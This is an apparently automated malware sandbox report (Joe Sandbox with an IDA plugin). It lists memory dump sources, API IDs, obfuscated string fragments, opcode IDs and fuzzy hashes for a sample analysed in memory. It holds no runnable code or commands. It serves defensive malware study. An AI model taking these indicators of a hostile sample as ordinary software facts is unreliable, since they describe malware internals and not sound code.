                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 086c5cc331717cdea517a31ab1d9914d501b478e998c7446910487fdae924233
                                                                                    • Instruction ID: a52e99798489afb9963ddcbcc95c3792ecccfef423c31d23965c432cdcb9342d
                                                                                    • Opcode Fuzzy Hash: 086c5cc331717cdea517a31ab1d9914d501b478e998c7446910487fdae924233
                                                                                    • Instruction Fuzzy Hash: AEC04835145124AACB14AB14FC49FCA3A68EF466A4F1A0491B405A70B18660AC82ABA8
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: ed0e20920c0af814f69093fe9f89cbee1aaacba6fb0d2e1f445116019980edbf
                                                                                    • Instruction ID: d0a1c20e9f9ad68813d30056b70b21e068add8abd07871f4d92c068244ee5ce2
                                                                                    • Opcode Fuzzy Hash: ed0e20920c0af814f69093fe9f89cbee1aaacba6fb0d2e1f445116019980edbf
                                                                                    • Instruction Fuzzy Hash: 9BC04CB114450ADFA7444F51C84B9FF3A64E912345B20041EEC4155650E6725D24D756
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
                                                                                    • API String ID: 0-154584671
                                                                                    • Opcode ID: 718f8b8522ac4d86ad6bd364561e16080b71ab201554445696552f0ea110dd44
                                                                                    • Instruction ID: ba5c72b72040895660a46f43f57094faddab44a4111e04777c27cc018d995845
                                                                                    • Opcode Fuzzy Hash: 718f8b8522ac4d86ad6bd364561e16080b71ab201554445696552f0ea110dd44
                                                                                    • Instruction Fuzzy Hash: 07C1D17550C3A08FC3258F29889066ABBE2EF96320F188B6DF4F957392C7358945CB52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: =z9|$JK$Vj)l$}~$CE$GI
                                                                                    • API String ID: 0-2837980318
                                                                                    • Opcode ID: d38376caff737a6c94feab8593588058999cf8110e06e1dab3bfdb0f787ae3e1
                                                                                    • Instruction ID: 56793188dd682d2880008f44807ef17e08a3c7689c736f280901d5c4b8fc0d46
                                                                                    • Opcode Fuzzy Hash: d38376caff737a6c94feab8593588058999cf8110e06e1dab3bfdb0f787ae3e1
                                                                                    • Instruction Fuzzy Hash: A6020DB550C3408BC724DF69D89266FBBE2EFD5314F08981CE4D68B352E7348A09DB96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 2wo$DH>_$VL.U$^p/u$m~
                                                                                    • API String ID: 0-1082855936
                                                                                    • Opcode ID: a415da80614236184c29ff8616c1650d36967c1b9203feb3c6b2da0238dd7e3c
                                                                                    • Instruction ID: 195c111a5eaca7901d29d94ee1fde62ed2cb51ddf272d019b3f0bc0042764e83
                                                                                    • Opcode Fuzzy Hash: a415da80614236184c29ff8616c1650d36967c1b9203feb3c6b2da0238dd7e3c
                                                                                    • Instruction Fuzzy Hash: 51B218F36082049FE304AE2DDC8567AFBE9EF94320F1A8A3DE6C4C7744E67558058697
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #$0$AGsW$P$k
                                                                                    • API String ID: 0-1629916805
                                                                                    • Opcode ID: 679cc22f760b82ccbfa396914935b230ce4da52e8c625080fb4259f65461543f
                                                                                    • Instruction ID: a6bf2adc9733e61d75151b7b8dd031e0eab4af98a6f141692fc65cbc80796116
                                                                                    • Opcode Fuzzy Hash: 679cc22f760b82ccbfa396914935b230ce4da52e8c625080fb4259f65461543f
                                                                                    • Instruction Fuzzy Hash: 06C1D5712083818FD328CF39C4553ABBBE2AFD2304F68C56DD4EA8B2D1D6798509D712
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: <#X$HI?_$w&JW$]'
                                                                                    • API String ID: 0-3506992731
                                                                                    • Opcode ID: fc3a064b6eba5fe12ac947fd9ba0c99dda6d8efd4b3c77d83797a104ad838ae7
                                                                                    • Instruction ID: db8979b6844f858b32d4918dbc56cb0536f30e2922361f5f096d910a0a6f147e
                                                                                    • Opcode Fuzzy Hash: fc3a064b6eba5fe12ac947fd9ba0c99dda6d8efd4b3c77d83797a104ad838ae7
                                                                                    • Instruction Fuzzy Hash: 6CB205F3A0C2049FE304AE2DEC8567ABBE5EF94720F16893DE6C4C7344E63598458697
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: "$N$_$v
                                                                                    • API String ID: 0-3196990088
                                                                                    • Opcode ID: 02060e9d7bd50cb19a178bbcbb7ee1c276137293499f0db37b783eeebcda3d0b
                                                                                    • Instruction ID: 38b5f74dde89ed932dc9443ddd3298d8a6218eba519eda6e38b30b9591e96216
                                                                                    • Opcode Fuzzy Hash: 02060e9d7bd50cb19a178bbcbb7ee1c276137293499f0db37b783eeebcda3d0b
                                                                                    • Instruction Fuzzy Hash: C4127CA3F2156507F7540878CD193A29A8297A1324F2F82788E6CEB7C6D8BEDD4943D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: '|$-.$12$i>}0
                                                                                    • API String ID: 0-2215797287
                                                                                    • Opcode ID: b0f5fd6a44b8bd67c10b8d1deb7ac73ae9c49f0a21e0bb4b01d458479ca85600
                                                                                    • Instruction ID: 864cc3bb45b4f58ec7b3fb3265398d2924987eea1d2b13decfff11ee9b6ccf5a
                                                                                    • Opcode Fuzzy Hash: b0f5fd6a44b8bd67c10b8d1deb7ac73ae9c49f0a21e0bb4b01d458479ca85600
                                                                                    • Instruction Fuzzy Hash: DBD1FF7220C3118FD718CF28D89179FB7E2EFC1314F05892DE5A98B291EB74950ACB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: "$N$_$v
                                                                                    • API String ID: 0-3196990088
                                                                                    • Opcode ID: dd1141566bef5d47434849a00b9e1a4064383d71640f4220cc46f7e6b130335e
                                                                                    • Instruction ID: 42da1be7f9e60c234db3e5de935e36544cc04ba440292301cf1931db6b8ebfad
                                                                                    • Opcode Fuzzy Hash: dd1141566bef5d47434849a00b9e1a4064383d71640f4220cc46f7e6b130335e
                                                                                    • Instruction Fuzzy Hash: 34E17CA3F2156507F7650878CD093A29A8297A1324F1F8279CE6CEB7C6D8BEDD4843D4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: cba`$f
                                                                                    • API String ID: 2994545307-1109690103
                                                                                    • Opcode ID: 57a349b25179ceef353a9af13aaf258dc4980c00b128270864e3c41f658e630f
                                                                                    • Instruction ID: 13af5ef9367a6306d248181260834f729e3784ccf8dd2507b539bfc5e068a885
                                                                                    • Opcode Fuzzy Hash: 57a349b25179ceef353a9af13aaf258dc4980c00b128270864e3c41f658e630f
                                                                                    • Instruction Fuzzy Hash: 8B2205716083419FE314DF28C88072EBBE2EBD5308F19852EE4A6873A6D775DA05CB57
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &h9j$kIw
                                                                                    • API String ID: 0-3608247809
                                                                                    • Opcode ID: f9b896e17d494bdfe4b7493165f95e402c7acabc2341d9035b54f627655439c8
                                                                                    • Instruction ID: 97cf44aa2f30d8f7493b556fa5f2b112eb1121c07f214148bb479c6ba112b087
                                                                                    • Opcode Fuzzy Hash: f9b896e17d494bdfe4b7493165f95e402c7acabc2341d9035b54f627655439c8
                                                                                    • Instruction Fuzzy Hash: B312DCF3E156204BF3444939DC583A6B696EBD4324F2F823C9E88A7BC5D97E9C094384
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271018662.0000000000F57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271128040.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2271145520.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: /i}}$AQYf
                                                                                    • API String ID: 0-4225342931
                                                                                    • Opcode ID: fc6c3864fa444cd66ba443bcc0ceb2b0b7f27ea8ec2f55561f7601ddbdb4c9f0
                                                                                    • Instruction ID: 4092d4950b530026a713421e688611fe1532d2d8adec99080aff4a1effd10013
                                                                                    • Opcode Fuzzy Hash: fc6c3864fa444cd66ba443bcc0ceb2b0b7f27ea8ec2f55561f7601ddbdb4c9f0
                                                                                    • Instruction Fuzzy Hash: 7002DEF3E146208BF3445D28DC99366BA92EBD4320F2F863D8A9D977C5D97D8C058385
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270699469.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2270683437.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270699469.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270755744.0000000000CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000CA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2270770149.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
